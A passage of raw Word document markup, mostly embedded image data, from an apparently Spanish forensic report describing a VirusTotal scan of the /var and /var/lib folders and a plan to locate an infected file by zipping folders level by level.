HW4fx8JdlE9YqkMGC&#10;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&#10;/P8L5Q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Kw9gQkkEAADZCwAADgAAAAAAAAAAAAAAAAA6AgAAZHJzL2Uyb0RvYy54bWxQSwECLQAKAAAA&#10;AAAAACEAUDjj28/bAADP2wAAFAAAAAAAAAAAAAAAAACvBgAAZHJzL21lZGlhL2ltYWdlMS5wbmdQ&#10;SwECLQAKAAAAAAAAACEAPqi04rS+AAC0vgAAFAAAAAAAAAAAAAAAAACw4gAAZHJzL21lZGlhL2lt&#10;YWdlMi5wbmdQSwECLQAUAAYACAAAACEA1GP+m+EAAAAKAQAADwAAAAAAAAAAAAAAAACWoQEAZHJz&#10;L2Rvd25yZXYueG1sUEsBAi0AFAAGAAgAAAAhAC5s8ADFAAAApQEAABkAAAAAAAAAAAAAAAAApKIB&#10;AGRycy9fcmVscy9lMm9Eb2MueG1sLnJlbHNQSwUGAAAAAAcABwC+AQAAoKMBAAAA&#10;">
                <v:group id="_x0000_s1142" style="position:absolute;left:159;width:54025;height:14662" coordsize="54027,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EOhyAAAAOMAAAAPAAAAZHJzL2Rvd25yZXYueG1sRE/NasJA&#10;EL4XfIdlhN7qJlqLia4i0hYPIlQF8TZkxySYnQ3ZbRLf3hUKPc73P4tVbyrRUuNKywriUQSCOLO6&#10;5FzB6fj1NgPhPLLGyjIpuJOD1XLwssBU245/qD34XIQQdikqKLyvUyldVpBBN7I1ceCutjHow9nk&#10;UjfYhXBTyXEUfUiDJYeGAmvaFJTdDr9GwXeH3XoSf7a723Vzvxyn+/MuJqVeh/16DsJT7//Ff+6t&#10;DvOjZDybvCdJDM+fAgBy+QAAAP//AwBQSwECLQAUAAYACAAAACEA2+H2y+4AAACFAQAAEwAAAAAA&#10;AAAAAAAAAAAAAAAAW0NvbnRlbnRfVHlwZXNdLnhtbFBLAQItABQABgAIAAAAIQBa9CxbvwAAABUB&#10;AAALAAAAAAAAAAAAAAAAAB8BAABfcmVscy8ucmVsc1BLAQItABQABgAIAAAAIQCxXEOhyAAAAOMA&#10;AAAPAAAAAAAAAAAAAAAAAAcCAABkcnMvZG93bnJldi54bWxQSwUGAAAAAAMAAwC3AAAA/AIAAAAA&#10;">
                  <v:shape id="Imagen 48" o:spid="_x0000_s1143" type="#_x0000_t75" alt="Interfaz de usuario gráfica, Texto, Aplicación&#10;&#10;Descripción generada automáticamente" style="position:absolute;width:26885;height:14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0gzAAAAOIAAAAPAAAAZHJzL2Rvd25yZXYueG1sRI9BS8NA&#10;FITvgv9heYIXaXeNVmvstkhBqT0UbAv2+Mg+k9Ds2zRvbeO/dwWhx2FmvmEms9436kid1IEt3A4N&#10;KOIiuJpLC9vN62AMSiKywyYwWfghgdn08mKCuQsn/qDjOpYqQVhytFDF2OZaS1GRRxmGljh5X6Hz&#10;GJPsSu06PCW4b3RmzIP2WHNaqLCleUXFfv3tLex38u4lW60W27f5wdXhIDefS2uvr/qXZ1CR+ngO&#10;/7cXzkL2aEajp3tzB3+X0h3Q018AAAD//wMAUEsBAi0AFAAGAAgAAAAhANvh9svuAAAAhQEAABMA&#10;AAAAAAAAAAAAAAAAAAAAAFtDb250ZW50X1R5cGVzXS54bWxQSwECLQAUAAYACAAAACEAWvQsW78A&#10;AAAVAQAACwAAAAAAAAAAAAAAAAAfAQAAX3JlbHMvLnJlbHNQSwECLQAUAAYACAAAACEAAM29IMwA&#10;AADiAAAADwAAAAAAAAAAAAAAAAAHAgAAZHJzL2Rvd25yZXYueG1sUEsFBgAAAAADAAMAtwAAAAAD&#10;AAAAAA==&#10;">
                    <v:imagedata r:id="rId183" o:title="Interfaz de usuario gráfica, Texto, Aplicación&#10;&#10;Descripción generada automáticamente"/>
                  </v:shape>
                  <v:shape id="Imagen 49" o:spid="_x0000_s1144" type="#_x0000_t75" style="position:absolute;left:27363;top:272;width:26664;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JnYygAAAOIAAAAPAAAAZHJzL2Rvd25yZXYueG1sRI9Ba8JA&#10;FITvQv/D8oRepO7GgqmpqxTRKraX2tbzI/tMgtm3IbvV+O9dQehxmJlvmOm8s7U4UesrxxqSoQJB&#10;nDtTcaHh53v19ALCB2SDtWPScCEP89lDb4qZcWf+otMuFCJC2GeooQyhyaT0eUkW/dA1xNE7uNZi&#10;iLItpGnxHOG2liOlxtJixXGhxIYWJeXH3Z/VsDKf7wPqfpOPrbKX9fI42e9zo/Vjv3t7BRGoC//h&#10;e3tjNDyn6ShVSTKB26V4B+TsCgAA//8DAFBLAQItABQABgAIAAAAIQDb4fbL7gAAAIUBAAATAAAA&#10;AAAAAAAAAAAAAAAAAABbQ29udGVudF9UeXBlc10ueG1sUEsBAi0AFAAGAAgAAAAhAFr0LFu/AAAA&#10;FQEAAAsAAAAAAAAAAAAAAAAAHwEAAF9yZWxzLy5yZWxzUEsBAi0AFAAGAAgAAAAhABCAmdjKAAAA&#10;4gAAAA8AAAAAAAAAAAAAAAAABwIAAGRycy9kb3ducmV2LnhtbFBLBQYAAAAAAwADALcAAAD+AgAA&#10;AAA=&#10;">
                    <v:imagedata r:id="rId184" o:title=""/>
                  </v:shape>
                </v:group>
                <v:shape id="_x0000_s1145" type="#_x0000_t202" style="position:absolute;top:14789;width:5402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CL8yAAAAOIAAAAPAAAAZHJzL2Rvd25yZXYueG1sRE/PS8Mw&#10;FL4L/g/hCV7EpXaljrpsjKGgXoZ1l90ezVtTbV5Kkm71vzeCsOPH93u5nmwvTuRD51jBwywDQdw4&#10;3XGrYP/5cr8AESKyxt4xKfihAOvV9dUSK+3O/EGnOrYihXCoUIGJcaikDI0hi2HmBuLEHZ23GBP0&#10;rdQezync9jLPslJa7Dg1GBxoa6j5rkerYFccduZuPD6/b4q5f9uP2/KrrZW6vZk2TyAiTfEi/ne/&#10;6jR/nuflY1bk8HcpYZCrXwAAAP//AwBQSwECLQAUAAYACAAAACEA2+H2y+4AAACFAQAAEwAAAAAA&#10;AAAAAAAAAAAAAAAAW0NvbnRlbnRfVHlwZXNdLnhtbFBLAQItABQABgAIAAAAIQBa9CxbvwAAABUB&#10;AAALAAAAAAAAAAAAAAAAAB8BAABfcmVscy8ucmVsc1BLAQItABQABgAIAAAAIQD8QCL8yAAAAOIA&#10;AAAPAAAAAAAAAAAAAAAAAAcCAABkcnMvZG93bnJldi54bWxQSwUGAAAAAAMAAwC3AAAA/AIAAAAA&#10;" stroked="f">
                  <v:textbox style="mso-fit-shape-to-text:t" inset="0,0,0,0">
                    <w:txbxContent>
                      <w:p w14:paraId="2C8CC677" w14:textId="405939BF" w:rsidR="007306FD" w:rsidRPr="00B80DDA" w:rsidRDefault="007306FD" w:rsidP="007306FD">
                        <w:pPr>
                          <w:pStyle w:val="Descripcin"/>
                          <w:rPr>
                            <w:rFonts w:cs="Arial"/>
                            <w:noProof/>
                          </w:rPr>
                        </w:pPr>
                        <w:r>
                          <w:t xml:space="preserve">Ilustración </w:t>
                        </w:r>
                        <w:fldSimple w:instr=" SEQ Ilustración \* ARABIC ">
                          <w:r w:rsidR="00117A4E">
                            <w:rPr>
                              <w:noProof/>
                            </w:rPr>
                            <w:t>37</w:t>
                          </w:r>
                        </w:fldSimple>
                        <w:r>
                          <w:t xml:space="preserve">: </w:t>
                        </w:r>
                        <w:bookmarkStart w:id="95" w:name="_Toc155782604"/>
                        <w:r w:rsidRPr="00F73499">
                          <w:t>Análisis de /var y /var/lib en VirusTotal.</w:t>
                        </w:r>
                        <w:bookmarkEnd w:id="95"/>
                      </w:p>
                    </w:txbxContent>
                  </v:textbox>
                </v:shape>
                <w10:wrap type="square"/>
              </v:group>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidR="000C4414" w:rsidRPr="000C4414">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Encontramos al menos que dentro hay un virus detectado, por ello, para detectar exactamente procedemos a dividir cada una de las carpetas en ZIP para </w:t>
      </w:r>
      <w:r w:rsidR="001C2D6F" w:rsidRPr="000C4414">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>así</w:t>
      </w:r>
      <w:r w:rsidR="000C4414" w:rsidRPr="000C4414">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> ir buscando nivel por nivel donde </w:t>
      </w:r>
      <w:r w:rsidR="001C2D6F" w:rsidRPr="000C4414">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>está</w:t>
      </w:r>
      <w:r w:rsidR="000C4414" w:rsidRPr="000C4414">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> el archivo infectado. Los zip que estén limpios procederé a descartarlos y eliminarlos, los positivos, les haré un pantallazo.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EA49A9A" w14:textId="4E1F64F8" w:rsidR="000C4414" w:rsidRPr="000C4414" w:rsidRDefault="000C4414" w:rsidP="000C4414">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000C4414">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Haciendo el proceso en primer nivel, se detecta que la carpeta </w:t>
      </w:r>
      <w:r w:rsidR="00AA0003" w:rsidRPr="00AA0003">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="22"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:r w:rsidRPr="00AA0003">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="22"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
